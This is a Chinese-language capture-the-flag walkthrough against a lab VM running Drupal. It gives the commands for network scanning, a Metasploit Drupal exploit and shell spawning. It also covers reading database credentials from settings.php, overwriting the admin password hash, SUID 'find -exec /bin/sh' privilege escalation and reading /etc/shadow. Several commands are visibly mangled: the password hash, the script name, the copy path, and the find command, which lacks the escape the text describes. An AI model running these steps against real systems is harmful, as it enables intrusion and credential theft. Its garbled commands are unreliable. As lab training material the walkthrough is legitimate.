扫描存活机器和服务
wine fscan.64 -h 192.168.56.0/24
确定靶机IP为:192.168.56.101
扫描端口
wine fscan.64 -h192.168.56.101 -p 1-65535
发现靶机开启22、80、111、44329端口
进入网站界面
添加火狐插件wappalyzer
版本系统:Drupal
在火狐自带的网站中搜索drupal漏洞信息
6.–渗透攻击
打开利用工具集msf
查找漏洞信息
search drupal
选择漏洞编号
use 1
查看需要设置的选项
上半部分是靶机需要设置的选项,下半部分是本机需要设置的选项
show options
设置参数
set rhost 192.168.56.101(靶机IP)
set lhost 192.168.56.103(本地IP)
启动渗透攻击(exploit)
exploit
进入shell
获取交互shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
ls
找到flag1
cat flag1.txt
进入站点目录sites 并ls一下
进入默认目录default并 ls一下
查看配置文件settings.php
找到flag2
发现一个数据库 用户名是:dbuser 密码是:R0ck3t 尝试连接一下
mysql -udbuser -pR0ck3t
查看一下所有的数据库,发现一个drupaldb数据库
看一眼drupaldb数据库里有什么?
show databases;
use drupaldb;
show tables;
发现有一个users表,进去瞅一眼
select * from users\G;
发现密码进行了加密
去找密码
cd scripts/
发现hash密码加密的脚本
运行脚本
./password -hash.sh “123456”
S S SD0NRUahiGqy7BHW1KKFRFL8tEdk6x/5R8X6olTCbOhJyMY6F5K/c
如果发现报错
使用命令cp -r …/includes ./复制整个includes目录至scripts目录,再次执行。
更新admin的密码
use drupaldb;
update users set pass=' S S SD0NRUahiGqy7BHW1KKFRFL8tEdk6x/5R8X6olTCbOhJyMY6F5K/c
’ where name=‘admin’;
进入浏览器,访问网站
然后通过修改的密码进行登录
admin:123456
进入网站之后查看内容,发现flag3
23.–进行find提权
flag3指出:特殊权限是需要用到 find和-exec 命令,也提到了shadow。就是说提权的话,需要用到以上两个命令,以及shadow文件。我们尝试查看shadow文件,提示权限不够
cat /etc/shadow 查看shadow文件
权限不够,不能查看
find提权:(suid)
find -name mysql -exec /bin/sh ;
-name:按文件名进行查找
-exec:对匹配对象执行命令,以;结束
但; 是特使字符,所以需要前面加\ 进行转义
提权成功
查看shadow文件
cat /etc/shadow
找到flag4
切换到flag4的家目录
cd ~flag4
ls
cat flag4.txt
进入root家目录
cd ~
ls
cat thefinalflag.txt
OK!!